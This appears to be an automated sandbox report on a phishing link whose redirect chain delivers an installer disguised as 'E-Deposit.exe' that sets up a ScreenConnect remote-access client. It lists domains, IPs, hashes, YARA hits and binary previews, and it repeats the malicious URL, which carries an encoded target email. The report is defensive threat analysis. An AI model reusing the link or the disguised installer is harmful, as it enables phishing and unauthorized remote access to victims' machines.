                      https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=1880%Avira URL Cloudsafe
                      SourceDetectionScannerLabelLink
                      C:\Users\user\Downloads\E-Deposit.exe (copy)26%ReversingLabsWin32.Exploit.ScreenConnectTool
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI6898.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                      C:\Windows\Installer\MSI71C1.tmp0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s3-w.us-east-1.amazonaws.com
                      3.5.28.39
                      truefalse
                        high
                        bitbucket.org
                        185.166.143.48
                        truefalse
                          high
                          slplegalfinance.com
                          185.143.228.176
                          truefalse
                            unknown
                            westcommerce.com.br
                            50.116.112.103
                            truefalse
                              unknown
                              baconredirects-elb-ymx6i3lu5f0j-2055456940.ap-south-1.elb.amazonaws.com
                              13.126.216.240
                              truefalse
                                unknown
                                fub.direct
                                18.172.112.30
                                truefalse
                                  unknown
                                  www.google.com
                                  142.250.186.132
                                  truefalse
                                    high
                                    bbuseruploads.s3.amazonaws.com
                                    unknown
                                    unknownfalse
                                      high
                                      g248jqtc.r.ap-south-1.awstrack.me
                                      unknown
                                      unknownfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.186.46
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.185.67
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        3.5.28.39
                                        s3-w.us-east-1.amazonaws.comUnited States
                                        14618AMAZON-AESUSfalse
                                        18.172.112.30
                                        fub.directUnited States
                                        3MIT-GATEWAYSUSfalse
                                        50.116.112.103
                                        westcommerce.com.brUnited States
                                        46606UNIFIEDLAYER-AS-1USfalse
                                        185.143.228.176
                                        slplegalfinance.comGermany
                                        61317ASDETUKhttpwwwheficedcomGBfalse
                                        64.233.167.84
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        13.126.216.240
                                        baconredirects-elb-ymx6i3lu5f0j-2055456940.ap-south-1.elb.amazonaws.comUnited States
                                        16509AMAZON-02USfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        185.166.143.48
                                        bitbucket.orgGermany
                                        16509AMAZON-02USfalse
                                        142.250.186.132
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        23.56.254.164
                                        unknownUnited States
                                        42961GPRS-ASZAINKWfalse
                                        IP
                                        192.168.2.17
                                        127.0.0.1
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1584783
                                        Start date and time:2025-01-06 14:00:11 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:27
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal72.evad.win@42/51@13/45
                                        • Exclude process from analysis (whitelisted): TextInputHost.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.186.46, 64.233.167.84, 142.250.185.238, 142.250.181.238
                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • VT rate limit hit for: https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):219736
                                        Entropy (8bit):6.581722481958688
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E6D01C853986F4CEBD80706D15CDE90F
                                        SHA1:84807A4A07FF569F4D560E44BE04FB91EE15A823
                                        SHA-256:6CE667027FF7D76ABD5F6072407B4BE998698D53EC205E9667070F00ADD99C78
                                        SHA-512:E239143C213FA960C0F876FAB1C6D2114462A6CF74E4589E3D4829B58F2181B9C62CAE3F3A78E9A5B56824B95678E365E911E2859F9482B930F1CDCAFE7614D7
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\506f30.rbs, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\506f30.rbs, Author: Joe Security
                                        Reputation:unknown
                                        Preview:...@IXOS.@.....@#@&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E29000A5-D988-BF34-ACFB-64A448AB1544}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{8E57D407-5D27-BB2E-53F9-13C161E29BDA}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{CE2EDB79-B248-8637-FD32-785C13A46331}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{0BF493B6-0475-E8DC-7971-F55AFBC83A92}&.{B8D1B927-3B49-E2F3-F63F
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):347
                                        Entropy (8bit):4.803780834806902
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EC6BAD264881A1AE9D05F73712399809
                                        SHA1:A7921B44D20ED663D486210C0775C96C45C08F7B
                                        SHA-256:5748A4BB4CC8E1E9BB3832E1F9E8914038A1B97D2C7523EC342E596317208FB8
                                        SHA-512:ED77CAFA64FE224CB11718CE26906ED807EEB49B2D59E359A7AB0196CE3DBB177663F91E116354E56C6B2441D091A0A07F71413723B7F8DEC1CB946FA2045E64
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.1..../Please do not turn off or unplug your computer...
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5733
                                        Entropy (8bit):4.54751304306711
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6F99B6E5484B5785AB7BF8E46882205A
                                        SHA1:8304A40796E3AA805F96F9AB6FCAC2E5A9676C6E
                                        SHA-256:E15E9D01D8049FF1E1B01E8E9845DF20A4C80A9CF883AA84E0E407A2D865B8E3
                                        SHA-512:56226014F2C00C062D7505687B2166CA2DA905FC921E292EAEDD95DC1FB9AD093EB9D1F657F7BA45B32E6040EE09361FB14535F6D0BF4E19FABF6B19942D928D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....1P)...H.p...5...............0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e..... .....PNG........IHDR.............[i.@...KPLTE.x........l......{..v........r.R..m...p..........`..d._..@..s........dFU...0IDATx...n.0.....icS......i.nF.....s.(g..+..u..5V.....i..Mk.T.......y..r]c..p.|.Dy....5.:.[C.........................................................s.>..G..[[).....o.>.Z.-...>...X....W...?....yF.{m|I.8..r.k.NIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIY.l.o.}NctiZc.....r..X.V..7r.......h.,.....IEND.B`...#124586 .........C......................- " " -D*2**2*D<I;7;I<lUKKUl}ici}.............C..
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):50133
                                        Entropy (8bit):4.759054454534641
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):26722
                                        Entropy (8bit):7.7401940386372345
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):197120
                                        Entropy (8bit):6.586775768189165
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3724F06F3422F4E42B41E23ACB39B152
                                        SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                        SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                        SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):68096
                                        Entropy (8bit):6.06942231395039
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5DB908C12D6E768081BCED0E165E36F8
                                        SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                        SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                        SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):95512
                                        Entropy (8bit):6.504684691533346
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:75B21D04C69128A7230A0998086B61AA
                                        SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                        SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                        SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1721856
                                        Entropy (8bit):6.639085961200334
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                        SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                        SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                        SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):260168
                                        Entropy (8bit):6.416438906122177
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                        SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                        SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                        SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):61208
                                        Entropy (8bit):6.310126082367387
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:AFA97CAF20F3608799E670E9D6253247
                                        SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                        SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                        SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):602392
                                        Entropy (8bit):6.176232491934078
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                        SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                        SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                        SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):266
                                        Entropy (8bit):4.842791478883622
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):842248
                                        Entropy (8bit):6.268561504485627
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BE74AB7A848A2450A06DE33D3026F59E
                                        SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                        SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                        SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
